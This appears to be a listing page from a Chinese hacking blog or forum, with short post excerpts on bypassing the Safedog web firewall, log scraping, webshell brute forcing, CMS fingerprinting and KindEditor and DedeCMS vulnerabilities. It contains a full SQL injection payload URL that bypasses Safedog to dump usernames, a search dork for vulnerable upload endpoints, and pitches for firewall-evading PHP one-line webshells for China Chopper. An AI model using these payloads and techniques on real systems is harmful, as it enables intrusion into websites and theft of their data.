过狗3连击 三种姿势SQL注入绕过安全狗

安全狗截图: 1、使用/*/**//*!/*!SELECT*/ 囊括关键字能够绕过安全狗的SQL注入拦截。Payload:http://192.168.119.136/sqli-labs-master/less-1/?id=-1'/*!UNION/*/**//*!/*!SELECT*/1,group_concat(username),3/*/**//*!/*!FROM*/users-- -绕过截图: 2、使用/*!union/*/*?%0o*/select*

thinkphp_log 日志扫描工具

thinkphp 如果开启了日志 记录 ,会把一些错误信息记录在log目录里这个工具能够帮助你 更加简单快捷地爬取错误日志。用法:thinkphp_log.py http://www.5kik.com/ 18 www.5kik.com.txt第一参数是 网站 请务必在最后加上/ 第二个参数 18是18年的  第三个参数 ybi.com是保存文件名。运行打开文件链接: https://pan.baidu.com/s/1pnH5B7L4sTFjMCyhBgzszA 密码: b7g

webshell爆破脚本

H]4W3H4X}3GC)EJ1KE9(Q.png

Whatcms - 支持超过300+的cms识别与漏洞检测工具

项目地址:https://whatcms.org/识别模式要检测CMS的使用情况,我们使用以下方法。MetaCMS有时会在每个页面的html中包含一个元标记。 这通常是一个“发电机”标签,如<meta name =“generator”content =“什么CMS”/>,但也可以是“应用程序名称”,“Powered-By”或CMS创建者决定使用的任何其他内容。Headers可以在相同的情况下使用HTTP标头(包括Cookie)来标识CMS。Markup如果一个CMS没有meta标记

发一个过狗一句话

过狗一句话

kindeditor最新上传漏洞

漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net漏洞存在于小于等于 kindeditor4.1.5 编辑器中根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在/asp/upload_json.asp/asp.net/upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php关键字:allinurl:/examples/u

中国菜刀专用过狗免杀PHP一句话

   中国菜刀专用过狗一句话

dedecms织梦找后台地址最新方法

1.png

C段查询功能已恢复正常!

同IP网站查询

DedeCMS V5.7 SP2后台存在代码执行漏洞

简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。漏洞详情织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。dede/tpl.php中第251行到281行csrf_check();if